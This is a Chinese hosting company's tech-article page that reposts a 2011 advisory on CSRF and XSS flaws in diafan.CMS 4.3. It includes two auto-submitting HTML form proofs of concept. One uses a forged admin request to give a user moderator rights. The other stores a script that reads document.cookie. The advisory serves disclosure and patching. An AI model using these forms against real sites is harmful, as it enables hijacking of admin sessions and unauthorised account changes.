您好,欢迎来到思海网络,我们将竭诚为您提供优质的服务! 诚征网络推广 | 网站备案 | 帮助中心 | 软件下载 | 购买流程 | 付款方式 | 联系我们 [ 会员登录/注册 ]
网站首页 服务器租用 服务器托管 云服务器 大带宽 高防服务器 虚拟主机 新闻中心 技术文章 关于我们
技术文章
促销推广
客服中心
业务咨询
有事点击这里…  531199185
有事点击这里…  61352289
点击这里给我发消息  81721488
有事点击这里…  376585780
有事点击这里…  872642803
有事点击这里…  459248018
有事点击这里…  61352288
有事点击这里…  380791050
技术支持
有事点击这里…  714236853
有事点击这里…  719304487
有事点击这里…  1208894568
有事点击这里…  61352289
在线客服
有事点击这里…  531199185
有事点击这里…  61352288
有事点击这里…  983054746
有事点击这里…  893984210
当前位置:首页 >> 技术文章 >> 文章浏览
技术文章

diafan.CMS 4.3 XSS and CSRF 漏洞及修复

添加时间:2011-1-13  添加: admin 

漏洞类型:跨站XSS
漏洞描述:CSRF攻击,该漏洞存在于“http://host/admin/usersite/save2/“脚本没有正确验证的HTTP请求的来源。

成功利用此漏洞可能导致应用程序的一个妥协,基于cookie的认证证书,泄露或窃取敏感数据的修改。

POC:

<input type="hidden" name="noOut" value="1">     <input type="hidden" name="save_post" value="1">     <input type="hidden" name="id" value="2">     <input type="hidden" name="fio" value="first name">     <input type="hidden" name="name" value="userlogin">     <input type="hidden" name="password" value="">     <input type="hidden" name="mail" value="email@example.com">     <input type="hidden" name="created" value="23.12.2010">     <input type="hidden" name="act" value="1">     <input type="hidden" name="moderator" value="1">     <input type="hidden" name="language" value="">     <input type="hidden" name="phone" value="phone">     <input type="hidden" name="city" value="city">     <input type="hidden" name="street" value="street">     <input type="hidden" name="home" value="5">     <input type="hidden" name="corps" value="">     <input type="hidden" name="flat" value="98">    </form>     <script>     document.main.submit();     </script>    XSS漏洞1:

由于该漏洞存在于“http://host/admin/site/save2/“提交数据未经过严格过滤导致提交XSS代码。成功利用此漏洞可能导致应用程序的一个妥协,基于cookie的认证证书,泄露或窃取敏感数据的修改。

POC:

<form action="http://host/admin/site/save2/" method="post" name="main" enctype="multipart/form-data" >     <input type="hidden" name="noOut" value="1">     <input type="hidden" name="save_post" value="1">     <input type="hidden" name="id" value="2">     <input type="hidden" name="name" value="page name">     <input type="hidden" name="act" value="1">     <input type="hidden" name="actm" value="1">     <input type="hidden" name="title_meta" value="title">     <input type="hidden" name="keywords" value="">     <input type="hidden" name="descr" value="">     <input type="hidden" name="rewrite" value="sef_url">     <input type="hidden" name="addmodule" value="">     <input type="hidden" name="parent_id" value="">     <input type="hidden" name="sort" value="2">     <input type="hidden" name="theme" value="">     <input type="hidden" name="othurl" value="">     <input type="hidden" name="text" value='content html"><script>alert(document.cookie)</script>'>     </form>     <script>     document.main.submit();     </script>    

修复:

脚本正确验证的HTTP请求的来源。
关健词:漏洞,修复

分享到:

顶部 】 【 关闭

新文章:

版权所有:佛山思海电脑网络有限公司 ©1998-2024 All Rights Reserved.
联系电话:(0757)22630313、22633833
中华人民共和国增值电信业务经营许可证: 粤B1.B2-20030321 备案号:粤B2-20030321-1
网站公安备案编号:44060602000007 交互式栏目专项备案编号:200303DD003  
察察 工商 网安 举报有奖  警警  手机打开网站